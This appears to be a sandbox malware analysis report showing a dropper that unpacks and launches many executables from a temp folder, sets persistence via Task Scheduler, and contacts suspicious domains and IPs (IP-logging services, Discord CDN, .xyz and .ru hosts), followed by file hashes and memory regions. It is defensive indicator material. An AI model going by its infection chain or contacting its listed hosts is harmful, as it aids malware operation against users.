PID 1288 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe C:\Users\Admin\AppData\Local\Temp\setup.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe

"C:\Users\Admin\AppData\Local\Temp\48ad5d8112df0d5b74f71fd25ccd4e18.exe"

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0035b9e6fdaf9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\53d58f3832.exe

53d58f3832.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe

"C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe" -a

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 576

C:\Users\Admin\AppData\Local\Temp\chrome2.exe

"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2024 -ip 2024

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0035b9e6fdaf9.exe

0035b9e6fdaf9.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\27e380c23ad33.exe

27e380c23ad33.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\cb3f07883441a5d6.exe

cb3f07883441a5d6.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\7da174d16d4.exe

7da174d16d4.exe

C:\Windows\winnetdriv.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1704621818 0

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\81edfb0db828.exe

81edfb0db828.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe

731da7284717.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe

0b0f89497d35095.exe

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe

95714f41791.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 81edfb0db828.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c cb3f07883441a5d6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 731da7284717.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 0b0f89497d35095.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 27e380c23ad33.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 7da174d16d4.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 53d58f3832.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c 95714f41791.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2516 -ip 2516

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

Network

Country Destination Domain Proto
US 8.8.8.8:53 watira.xyz udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 194.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 music-sec.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 iplogger.org udp
US 8.8.8.8:53 live.goatgame.live udp
US 34.117.186.192:443 ipinfo.io tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 192.186.117.34.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 53.96.141.3.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 172.67.132.113:443 iplogger.org tcp
NL 37.0.8.235:80 tcp
US 8.8.8.8:53 prophefliloc.tumblr.com udp
US 74.114.154.22:443 prophefliloc.tumblr.com tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 22.154.114.74.in-addr.arpa udp
US 8.8.8.8:53 113.132.67.172.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
MD 176.123.2.239:80 tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 146.78.124.51.in-addr.arpa udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 www.wpdsfds23x.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
NL 37.0.11.8:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 aucmoney.com udp
US 8.8.8.8:53 thegymmum.com udp
US 8.8.8.8:53 atvcampingtrips.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 kuapakualaman.com udp
US 8.8.8.8:53 renatazarazua.com udp
US 8.8.8.8:53 nasufmutlu.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 3.141.96.53:443 live.goatgame.live tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
N/A 127.0.0.1:52449 tcp
N/A 127.0.0.1:52451 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
MD 176.123.2.239:80 tcp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp
US 8.8.8.8:53 s.lletlee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

MD5 a79f8609262355ef1539aed4d5471a63
SHA1 86658bba60a1e3d4972da614087e8825c2646d2e
SHA256 8d87a4093c7c0e39ba64bd47acd82719307037e086fa907ed530d505ea8b3540
SHA512 bd7bf9f7a215a09d063e9ec8514a46614d4f3f39013390ca665244644d78d7812c7e99c75c21076d7bea3cdebcbaa4cbd231733cc0a78da6f9d6cd4896546c0d

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

MD5 fec53691cc3e034b6967a3340a0c15c8
SHA1 092651002570c17d9b493bc5d4ad194c91e16136
SHA256 ad665a1dd391bfaae019bb51ba72b0791c17e892acc3efd69aa7e14849ba9a16
SHA512 695f79e12b1465c07916a40db9086c0548d280ab8b615b6469a6157ed7ce669a8193474a782453b397d56929f32031b0cef445af66c62ed148e8ef99d9b3d48b

memory/2024-32-0x0000000000C60000-0x0000000000CEF000-memory.dmp

memory/2024-34-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-38-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-41-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-44-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/1068-96-0x0000000000FA0000-0x0000000000FCC000-memory.dmp

memory/1288-103-0x00000000734D0000-0x0000000073C80000-memory.dmp

memory/756-106-0x0000000000C70000-0x0000000000DB2000-memory.dmp

memory/756-111-0x0000000005C10000-0x00000000061B4000-memory.dmp

memory/756-113-0x0000000005700000-0x0000000005792000-memory.dmp

memory/1068-112-0x00000000017A0000-0x00000000017A6000-memory.dmp

memory/4972-126-0x0000000000990000-0x00000000009A0000-memory.dmp

memory/756-134-0x0000000005690000-0x000000000569A000-memory.dmp

memory/2296-136-0x0000000004840000-0x00000000048DD000-memory.dmp

memory/1288-139-0x00000000734D0000-0x0000000073C80000-memory.dmp

memory/756-137-0x00000000059D0000-0x0000000005A6C000-memory.dmp

memory/1068-138-0x000000001BEE0000-0x000000001BEF0000-memory.dmp

memory/4140-128-0x0000000000400000-0x0000000002C72000-memory.dmp

memory/2296-140-0x0000000000400000-0x0000000002CCE000-memory.dmp

memory/4140-109-0x0000000004780000-0x0000000004789000-memory.dmp

memory/1068-108-0x0000000001780000-0x00000000017A0000-memory.dmp

memory/4140-107-0x0000000002E90000-0x0000000002F90000-memory.dmp

memory/4972-141-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

memory/4820-105-0x000000001ACC0000-0x000000001ACD0000-memory.dmp

memory/1068-102-0x0000000001770000-0x0000000001776000-memory.dmp

memory/1068-142-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

memory/4820-97-0x00007FFCBDC40000-0x00007FFCBE701000-memory.dmp

memory/2296-144-0x0000000002D50000-0x0000000002E50000-memory.dmp

memory/756-143-0x00000000734D0000-0x0000000073C80000-memory.dmp

memory/1288-91-0x00000000003F0000-0x00000000004DE000-memory.dmp

memory/4820-81-0x00000000000D0000-0x00000000000D8000-memory.dmp

memory/3660-145-0x0000000000400000-0x00000000004E4000-memory.dmp

memory/1448-157-0x0000000000B30000-0x0000000000C14000-memory.dmp

memory/2024-163-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2024-161-0x0000000000400000-0x00000000009DB000-memory.dmp

memory/2024-166-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-167-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2024-168-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-165-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/3328-169-0x0000000000ED0000-0x0000000000EE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\0b0f89497d35095.exe

MD5 7983e14af3ba9fe1981d33b1a1fbfebb
SHA1 c78e705114c3e8f31402e1048c74626fe68f3321
SHA256 a1da52dabeaff4e9712949548cce00c8786b59fb1187d9823b94d2e7ca75e75f
SHA512 473544e7492300ff70d3d64d7b3610f0ca9edccf6768722b832eac4df5d63d09f05fed070cb53477f8939be776a0b7661c263fe17ab68693d9e1a70e39935ce9

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\731da7284717.exe

MD5 c0d18a829910babf695b4fdaea21a047
SHA1 236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA256 78958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512 cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823

memory/4140-170-0x0000000000400000-0x0000000002C72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\95714f41791.exe

MD5 3fffde8679f15a688d99b5206957271a
SHA1 1668e52fdbc2822f0b032859ba225d0b05012538
SHA256 bad9ea3883bad46c6b1be8094cd9cfe28db41a981eb0ce5f4aa1c76193e6a1bf
SHA512 9d9c9e86821d8ee95f4ae46892e66500f221df983391b07148203d335c96a297b49339cc8515f8b862a333ae3eb7286641039f3461e8c4af915de58b6af0c3c7

memory/2024-43-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2024-42-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-40-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-39-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2024-37-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-35-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2024-36-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2024-33-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2024-28-0x000000006B280000-0x000000006B2A6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

memory/756-182-0x0000000002FA0000-0x0000000002FB2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS4618E977\setup_install.exe

MD5 3b68307657ddbfa9e4c8944872a14836
SHA1 e4e2bfc2f5519af5e633a8e1b8120aecabde517f
SHA256 6684153e0baae31eddfc744ca7a28a6897df073e467ebf138f2df5604c726c0d
SHA512 c60a8b4e74b12d006a790388f9f44e180cd3849842dee7fd4e4bff330640eb262714070eb11f8ac66904f0a63d11b5bd152e76be2aa0dbef813f6d42428f48ab

memory/4820-186-0x000000001ACC0000-0x000000001ACD0000-memory.dmp

memory/756-187-0x0000000005640000-0x0000000005650000-memory.dmp

memory/2296-188-0x0000000002D50000-0x0000000002E50000-memory.dmp

memory/4972-190-0x000000001CD30000-0x000000001CD32000-memory.dmp

memory/4972-189-0x0000000002F00000-0x0000000002F0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 a628baa97881fa5528009c9470cadee0
SHA1 583aa730e302fe0015cdb0dee4e279f193d66d87
SHA256 e2bb9ee3616cd827cc3ee297cbe24cfbd2ded4d9efe894e68453f6cfbf18e4c5
SHA512 c84e496e13d30c24efd020f25f4cd55b6157feb529f7285d97445c386fd50a50e943b0f67745a861a97c5bf0c4ff7dee7b5240d52c59b66421a9bdc26de58faf

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE

MD5 74bb44fc17b7b248a53c01eeb2d5b12a
SHA1 bd87175dbaf456e68e119c3c914d0f2686688c02
SHA256 305dd91a561dfe917bd077f43d9290567cf0c58291bca6e503d3d7ad39d02197
SHA512 33db4bfa67a6bbadf7296d38eace01023d7aa742ac36cea90835097df829b6cc74f3d0e496e965415fe4eacda2aca9b10538f3223317db06d215dd55b3a55f85

C:\Users\Admin\AppData\Local\Temp\7zS396A.tmp\Install.cmd

MD5 a3c236c7c80bbcad8a4efe06a5253731
SHA1 f48877ba24a1c5c5e070ca5ecb4f1fb4db363c07
SHA256 9a9e87561a30b24ad4ad95c763ec931a7cfcc0f4a5c23d12336807a61b089d7d
SHA512 dc73af4694b0d8390bcae0e9fd673b982d2c39f20ca4382fddc6475a70891ce9d8e86c2501d149e308c18cd4d3a335cc3411157de23acf6557ed21578c5f49cc